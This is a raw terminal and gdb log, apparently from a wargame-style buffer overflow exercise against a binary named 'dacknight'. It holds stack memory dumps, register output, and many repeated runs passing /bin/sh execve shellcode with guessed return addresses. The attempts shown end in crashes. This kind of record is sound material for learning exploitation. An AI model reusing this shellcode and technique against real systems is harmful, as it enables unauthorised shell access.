0xbffffd89:	0x2f3d454d	0x656d6f68	0x6c6f672f	0x49006d65
0xbffffd99:	0x5455504e	0x2f3d4352	0x2f637465	0x75706e69
0xbffffda9:	0x00637274	0x4c454853	0x622f3d4c	0x622f6e69
0xbffffdb9:	0x00687361	0x52455355	0x6c6f673d	0x42006d65
0xbffffdc9:	0x5f485341	0x3d564e45	0x6d6f682f	0x6f672f65
0xbffffdd9:	0x2f6d656c	0x7361622e	0x00637268	0x50534944
0xbffffde9:	0x3d59414c	0x2e323931	0x2e383631	0x2e353332
0xbffffdf9:	0x2e303a31	0x414c0030	0x653d474e	0x53555f6e
0xbffffe09:	0x54534f00	0x3d455059	0x756e694c	0x48530078
(gdb) 
0xbffffe19:	0x3d4c564c	0x534c0031	0x4c4f435f	0x3d53524f
0xbffffe29:	0x303d6f6e	0x69663a30	0x3a30303d	0x303d6964
0xbffffe39:	0x34333b31	0x3d6e6c3a	0x333b3130	0x69703a36
0xbffffe49:	0x3b30343d	0x733a3333	0x31303d6f	0x3a35333b
0xbffffe59:	0x343d6462	0x33333b30	0x3a31303b	0x343d6463
0xbffffe69:	0x33333b30	0x3a31303b	0x303d726f	0x35303b31
0xbffffe79:	0x3b37333b	0x6d3a3134	0x31303d69	0x3b35303b
0xbffffe89:	0x343b3733	0x78653a31	0x3b31303d	0x2a3a3233
0xbffffe99:	0x646d632e	0x3b31303d	0x2a3a3233	0x6578652e
0xbffffea9:	0x3b31303d	0x2a3a3233	0x6d6f632e	0x3b31303d
(gdb) 
0xbffffeb9:	0x2a3a3233	0x6d74622e	0x3b31303d	0x2a3a3233
0xbffffec9:	0x7461622e	0x3b31303d	0x2a3a3233	0x3d68732e
0xbffffed9:	0x333b3130	0x2e2a3a32	0x3d687363	0x333b3130
0xbffffee9:	0x2e2a3a32	0x3d726174	0x333b3130	0x2e2a3a31
0xbffffef9:	0x3d7a6774	0x333b3130	0x2e2a3a31	0x3d6a7261
0xbfffff09:	0x333b3130	0x2e2a3a31	0x3d7a6174	0x333b3130
0xbfffff19:	0x2e2a3a31	0x3d687a6c	0x333b3130	0x2e2a3a31
0xbfffff29:	0x3d70697a	0x333b3130	0x2e2a3a31	0x31303d7a
0xbfffff39:	0x3a31333b	0x3d5a2e2a	0x333b3130	0x2e2a3a31
0xbfffff49:	0x303d7a67	0x31333b31	0x622e2a3a	0x303d327a
(gdb) 
0xbfffff59:	0x31333b31	0x622e2a3a	0x31303d7a	0x3a31333b
0xbfffff69:	0x7a742e2a	0x3b31303d	0x2a3a3133	0x6d70722e
0xbfffff79:	0x3b31303d	0x2a3a3133	0x6970632e	0x31303d6f
0xbfffff89:	0x3a31333b	0x706a2e2a	0x31303d67	0x3a35333b
0xbfffff99:	0x69672e2a	0x31303d66	0x3a35333b	0x6d622e2a
0xbfffffa9:	0x31303d70	0x3a35333b	0x62782e2a	0x31303d6d
0xbfffffb9:	0x3a35333b	0x70782e2a	0x31303d6d	0x3a35333b
0xbfffffc9:	0x6e702e2a	0x31303d67	0x3a35333b	0x69742e2a
0xbfffffd9:	0x31303d66	0x3a35333b	0x2e3d5f00	0x6361642f
0xbfffffe9:	0x67696e6b	0x2e007468	0x6361642f	0x67696e6b
(gdb) 
0xbffffff9:	0x00007468	Cannot access memory at address 0xbffffffd
(gdb) x/40 $esp-100
0xbffffb35:	0x00080483	0xb1000000	0x6c080483	0x02080484
0xbffffb45:	0x64000000	0xe4bffffb	0xdc080482	0x60080484
0xbffffb55:	0x5c4000ae	0x90bffffb	0x0240013e	0x5c000000
0xbffffb65:	0x68bffffc	0x00bffffc	0x92000000	0xb4bffffc
0xbffffb75:	0xbebffffc	0xccbffffc	0xebbffffc	0xf9bffffc
0xbffffb85:	0x12bffffc	0x2dbffffd	0x38bffffd	0x46bffffd
0xbffffb95:	0x87bffffd	0x98bffffd	0xadbffffd	0xbdbffffd
0xbffffba5:	0xc8bffffd	0xe5bffffd	0xffbffffd	0x0abffffd
0xbffffbb5:	0x17bffffe	0x1fbffffe	0xe2bffffe	0x00bfffff
0xbffffbc5:	0x03000000	0x34000000	0x04080480	0x20000000
(gdb) 
0xbffffbd5:	0x05000000	0x06000000	0x06000000	0x00000000
0xbffffbe5:	0x07000010	0x00000000	0x08400000	0x00000000
0xbffffbf5:	0x09000000	0x90000000	0x0b080483	0xff000000
0xbffffc05:	0x0c000001	0xff000000	0x0d000001	0xff000000
0xbffffc15:	0x0e000001	0xff000000	0x10000001	0xff000000
0xbffffc25:	0x0f0fabfb	0x57000000	0x00bffffc	0x00000000
0xbffffc35:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc45:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc55:	0x36690000	0x2e003638	0x6361642f	0x67696e6b
0xbffffc65:	0x90007468	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffc75:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc85:	0x90909090	0x90909090	0x91909090	0x53454c00
0xbffffc95:	0x45504f53	0x2f7c3d4e	0x2f727375	0x2f6e6962
0xbffffca5:	0x7373656c	0x65706970	0x2068732e	0x55007325
0xbffffcb5:	0x4e524553	0x3d454d41	0x53494800	0x5a495354
0xbffffcc5:	0x30313d45	0x48003030	0x4e54534f	0x3d454d41
0xbffffcd5:	0x61636f6c	0x736f686c	0x6f6c2e74	0x646c6163
0xbffffce5:	0x69616d6f	0x4f4c006e	0x4d414e47	0x6f673d45
0xbffffcf5:	0x006d656c	0x4f4d4552	0x4f484554	0x313d5453
0xbffffd05:	0x312e3239	0x322e3836	0x312e3533	0x49414d00
(gdb) 
0xbffffd15:	0x762f3d4c	0x732f7261	0x6c6f6f70	0x69616d2f
0xbffffd25:	0x6f672f6c	0x006d656c	0x4d524554	0x6574783d
0xbffffd35:	0x48006d72	0x5454534f	0x3d455059	0x36383369
0xbffffd45:	0x54415000	0x752f3d48	0x6c2f7273	0x6c61636f
0xbffffd55:	0x6e69622f	0x69622f3a	0x752f3a6e	0x622f7273
0xbffffd65:	0x2f3a6e69	0x2f727375	0x52313158	0x69622f36
0xbffffd75:	0x682f3a6e	0x2f656d6f	0x656c6f67	0x69622f6d
0xbffffd85:	0x4f48006e	0x2f3d454d	0x656d6f68	0x6c6f672f
0xbffffd95:	0x49006d65	0x5455504e	0x2f3d4352	0x2f637465
0xbffffda5:	0x75706e69	0x00637274	0x4c454853	0x622f3d4c
(gdb) /
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) 
Undefined command: "".  Try "help".
(gdb) x/40 $esp-100
0xbffffb35:	0x00080483	0xb1000000	0x6c080483	0x02080484
0xbffffb45:	0x64000000	0xe4bffffb	0xdc080482	0x60080484
0xbffffb55:	0x5c4000ae	0x90bffffb	0x0240013e	0x5c000000
0xbffffb65:	0x68bffffc	0x00bffffc	0x92000000	0xb4bffffc
0xbffffb75:	0xbebffffc	0xccbffffc	0xebbffffc	0xf9bffffc
0xbffffb85:	0x12bffffc	0x2dbffffd	0x38bffffd	0x46bffffd
0xbffffb95:	0x87bffffd	0x98bffffd	0xadbffffd	0xbdbffffd
0xbffffba5:	0xc8bffffd	0xe5bffffd	0xffbffffd	0x0abffffd
0xbffffbb5:	0x17bffffe	0x1fbffffe	0xe2bffffe	0x00bfffff
0xbffffbc5:	0x03000000	0x34000000	0x04080480	0x20000000
(gdb) 
0xbffffbd5:	0x05000000	0x06000000	0x06000000	0x00000000
0xbffffbe5:	0x07000010	0x00000000	0x08400000	0x00000000
0xbffffbf5:	0x09000000	0x90000000	0x0b080483	0xff000000
0xbffffc05:	0x0c000001	0xff000000	0x0d000001	0xff000000
0xbffffc15:	0x0e000001	0xff000000	0x10000001	0xff000000
0xbffffc25:	0x0f0fabfb	0x57000000	0x00bffffc	0x00000000
0xbffffc35:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc45:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc55:	0x36690000	0x2e003638	0x6361642f	0x67696e6b
0xbffffc65:	0x90007468	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffc75:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc85:	0x90909090	0x90909090	0x91909090	0x53454c00
0xbffffc95:	0x45504f53	0x2f7c3d4e	0x2f727375	0x2f6e6962
0xbffffca5:	0x7373656c	0x65706970	0x2068732e	0x55007325
0xbffffcb5:	0x4e524553	0x3d454d41	0x53494800	0x5a495354
0xbffffcc5:	0x30313d45	0x48003030	0x4e54534f	0x3d454d41
0xbffffcd5:	0x61636f6c	0x736f686c	0x6f6c2e74	0x646c6163
0xbffffce5:	0x69616d6f	0x4f4c006e	0x4d414e47	0x6f673d45
0xbffffcf5:	0x006d656c	0x4f4d4552	0x4f484554	0x313d5453
0xbffffd05:	0x312e3239	0x322e3836	0x312e3533	0x49414d00
(gdb) 
0xbffffd15:	0x762f3d4c	0x732f7261	0x6c6f6f70	0x69616d2f
0xbffffd25:	0x6f672f6c	0x006d656c	0x4d524554	0x6574783d
0xbffffd35:	0x48006d72	0x5454534f	0x3d455059	0x36383369
0xbffffd45:	0x54415000	0x752f3d48	0x6c2f7273	0x6c61636f
0xbffffd55:	0x6e69622f	0x69622f3a	0x752f3a6e	0x622f7273
0xbffffd65:	0x2f3a6e69	0x2f727375	0x52313158	0x69622f36
0xbffffd75:	0x682f3a6e	0x2f656d6f	0x656c6f67	0x69622f6d
0xbffffd85:	0x4f48006e	0x2f3d454d	0x656d6f68	0x6c6f672f
0xbffffd95:	0x49006d65	0x5455504e	0x2f3d4352	0x2f637465
0xbffffda5:	0x75706e69	0x00637274	0x4c454853	0x622f3d4c
(gdb) x/40 $esp-101 
0xbffffb34:	0x08048390	0x00000000	0x080483b1	0x0804846c
0xbffffb44:	0x00000002	0xbffffb64	0x080482e4	0x080484dc
0xbffffb54:	0x4000ae60	0xbffffb5c	0x40013e90	0x00000002
0xbffffb64:	0xbffffc5c	0xbffffc68	0x00000000	0xbffffc92
0xbffffb74:	0xbffffcb4	0xbffffcbe	0xbffffccc	0xbffffceb
0xbffffb84:	0xbffffcf9	0xbffffd12	0xbffffd2d	0xbffffd38
0xbffffb94:	0xbffffd46	0xbffffd87	0xbffffd98	0xbffffdad
0xbffffba4:	0xbffffdbd	0xbffffdc8	0xbffffde5	0xbffffdff
0xbffffbb4:	0xbffffe0a	0xbffffe17	0xbffffe1f	0xbfffffe2
0xbffffbc4:	0x00000000	0x00000003	0x08048034	0x00000004
(gdb) 
0xbffffbd4:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbe4:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbf4:	0x00000000	0x00000009	0x08048390	0x0000000b
0xbffffc04:	0x000001ff	0x0000000c	0x000001ff	0x0000000d
0xbffffc14:	0x000001ff	0x0000000e	0x000001ff	0x00000010
0xbffffc24:	0x0fabfbff	0x0000000f	0xbffffc57	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x69000000	0x00363836	0x61642f2e	0x696e6b63
0xbffffc64:	0x00746867	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffc74:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc84:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc94:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca4:	0x73656c2f	0x70697073	0x68732e65	0x00732520
0xbffffcb4:	0x52455355	0x454d414e	0x4948003d	0x49535453
0xbffffcc4:	0x313d455a	0x00303030	0x54534f48	0x454d414e
0xbffffcd4:	0x636f6c3d	0x6f686c61	0x6c2e7473	0x6c61636f
0xbffffce4:	0x616d6f64	0x4c006e69	0x414e474f	0x673d454d
0xbffffcf4:	0x6d656c6f	0x4d455200	0x4845544f	0x3d54534f
0xbffffd04:	0x2e323931	0x2e383631	0x2e353332	0x414d0031
(gdb) info reg
eax            0x3e	62
ecx            0x400	1024
edx            0x40106980	1074817408
ebx            0x401081ec	1074823660
esp            0xbffffb99	-1073742951
ebp            0x46bffffd	1186988029
esi            0x4000ae60	1073786464
edi            0xbffffb64	-1073743004
eip            0x87bffffd	-2017460227
eflags         0x10286	66182
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x2b	43
gs             0x2b	43
cwd            0x0	0
swd            0x0	0
twd            0x0	0
fip            0x0	0
fcs            0x0	0
fopo           0x0	0
fos            0x0	0
(gdb) x/40 $esp-101
0xbffffb34:	0x08048390	0x00000000	0x080483b1	0x0804846c
0xbffffb44:	0x00000002	0xbffffb64	0x080482e4	0x080484dc
0xbffffb54:	0x4000ae60	0xbffffb5c	0x40013e90	0x00000002
0xbffffb64:	0xbffffc5c	0xbffffc68	0x00000000	0xbffffc92
0xbffffb74:	0xbffffcb4	0xbffffcbe	0xbffffccc	0xbffffceb
0xbffffb84:	0xbffffcf9	0xbffffd12	0xbffffd2d	0xbffffd38
0xbffffb94:	0xbffffd46	0xbffffd87	0xbffffd98	0xbffffdad
0xbffffba4:	0xbffffdbd	0xbffffdc8	0xbffffde5	0xbffffdff
0xbffffbb4:	0xbffffe0a	0xbffffe17	0xbffffe1f	0xbfffffe2
0xbffffbc4:	0x00000000	0x00000003	0x08048034	0x00000004
(gdb) 
0xbffffbd4:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbe4:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbf4:	0x00000000	0x00000009	0x08048390	0x0000000b
0xbffffc04:	0x000001ff	0x0000000c	0x000001ff	0x0000000d
0xbffffc14:	0x000001ff	0x0000000e	0x000001ff	0x00000010
0xbffffc24:	0x0fabfbff	0x0000000f	0xbffffc57	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x69000000	0x00363836	0x61642f2e	0x696e6b63
0xbffffc64:	0x00746867	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffc74:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc84:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc94:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca4:	0x73656c2f	0x70697073	0x68732e65	0x00732520
0xbffffcb4:	0x52455355	0x454d414e	0x4948003d	0x49535453
0xbffffcc4:	0x313d455a	0x00303030	0x54534f48	0x454d414e
0xbffffcd4:	0x636f6c3d	0x6f686c61	0x6c2e7473	0x6c61636f
0xbffffce4:	0x616d6f64	0x4c006e69	0x414e474f	0x673d454d
0xbffffcf4:	0x6d656c6f	0x4d455200	0x4845544f	0x3d54534f
0xbffffd04:	0x2e323931	0x2e383631	0x2e353332	0x414d0031
(gdb) 
0xbffffd14:	0x2f3d4c49	0x2f726176	0x6f6f7073	0x616d2f6c
0xbffffd24:	0x672f6c69	0x6d656c6f	0x52455400	0x74783d4d
0xbffffd34:	0x006d7265	0x54534f48	0x45505954	0x3833693d
0xbffffd44:	0x41500036	0x2f3d4854	0x2f727375	0x61636f6c
0xbffffd54:	0x69622f6c	0x622f3a6e	0x2f3a6e69	0x2f727375
0xbffffd64:	0x3a6e6962	0x7273752f	0x3131582f	0x622f3652
0xbffffd74:	0x2f3a6e69	0x656d6f68	0x6c6f672f	0x622f6d65
0xbffffd84:	0x48006e69	0x3d454d4f	0x6d6f682f	0x6f672f65
0xbffffd94:	0x006d656c	0x55504e49	0x3d435254	0x6374652f
0xbffffda4:	0x706e692f	0x63727475	0x45485300	0x2f3d4c4c
(gdb) 
0xbffffdb4:	0x2f6e6962	0x68736162	0x45535500	0x6f673d52
0xbffffdc4:	0x006d656c	0x48534142	0x564e455f	0x6f682f3d
0xbffffdd4:	0x672f656d	0x6d656c6f	0x61622e2f	0x63726873
0xbffffde4:	0x53494400	0x59414c50	0x3239313d	0x3836312e
0xbffffdf4:	0x3533322e	0x303a312e	0x4c00302e	0x3d474e41
0xbffffe04:	0x555f6e65	0x534f0053	0x45505954	0x6e694c3d
0xbffffe14:	0x53007875	0x4c564c48	0x4c00313d	0x4f435f53
0xbffffe24:	0x53524f4c	0x3d6f6e3d	0x663a3030	0x30303d69
0xbffffe34:	0x3d69643a	0x333b3130	0x6e6c3a34	0x3b31303d
0xbffffe44:	0x703a3633	0x30343d69	0x3a33333b	0x303d6f73
(gdb) 
0xbffffe54:	0x35333b31	0x3d64623a	0x333b3034	0x31303b33
0xbffffe64:	0x3d64633a	0x333b3034	0x31303b33	0x3d726f3a
0xbffffe74:	0x303b3130	0x37333b35	0x3a31343b	0x303d696d
0xbffffe84:	0x35303b31	0x3b37333b	0x653a3134	0x31303d78
0xbffffe94:	0x3a32333b	0x6d632e2a	0x31303d64	0x3a32333b
0xbffffea4:	0x78652e2a	0x31303d65	0x3a32333b	0x6f632e2a
0xbffffeb4:	0x31303d6d	0x3a32333b	0x74622e2a	0x31303d6d
0xbffffec4:	0x3a32333b	0x61622e2a	0x31303d74	0x3a32333b
0xbffffed4:	0x68732e2a	0x3b31303d	0x2a3a3233	0x6873632e
0xbffffee4:	0x3b31303d	0x2a3a3233	0x7261742e	0x3b31303d
(gdb) 
0xbffffef4:	0x2a3a3133	0x7a67742e	0x3b31303d	0x2a3a3133
0xbfffff04:	0x6a72612e	0x3b31303d	0x2a3a3133	0x7a61742e
0xbfffff14:	0x3b31303d	0x2a3a3133	0x687a6c2e	0x3b31303d
0xbfffff24:	0x2a3a3133	0x70697a2e	0x3b31303d	0x2a3a3133
0xbfffff34:	0x303d7a2e	0x31333b31	0x5a2e2a3a	0x3b31303d
0xbfffff44:	0x2a3a3133	0x3d7a672e	0x333b3130	0x2e2a3a31
0xbfffff54:	0x3d327a62	0x333b3130	0x2e2a3a31	0x303d7a62
0xbfffff64:	0x31333b31	0x742e2a3a	0x31303d7a	0x3a31333b
0xbfffff74:	0x70722e2a	0x31303d6d	0x3a31333b	0x70632e2a
0xbfffff84:	0x303d6f69	0x31333b31	0x6a2e2a3a	0x303d6770
(gdb) q
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
1￐h//shh/bin⏓ኂ°
               ̀ 
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x60"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x50"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ 
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ 
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ 
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ 
[golem@localhost golem]$ 
[golem@localhost golem]$ 
[golem@localhost golem]$ 
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*4+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight ¿d 1￐h//shh/bin⏓ኂ°
                                                     ̀'.
Program terminated with signal 11, Segmentation fault.
#0  0x0 in ?? ()
(gdb) x20 $esp
Undefined command: "x20".  Try "help".
(gdb) x20 $esp
Undefined command: "x20".  Try "help".
(gdb) x/20 $esp
0xbffffb08:	0x00000000	0xbffffb00	0x0804849e	0xbffffc6a
0xbffffb18:	0xbffffb38	0x400309cb	0x00000003	0xbffffb64
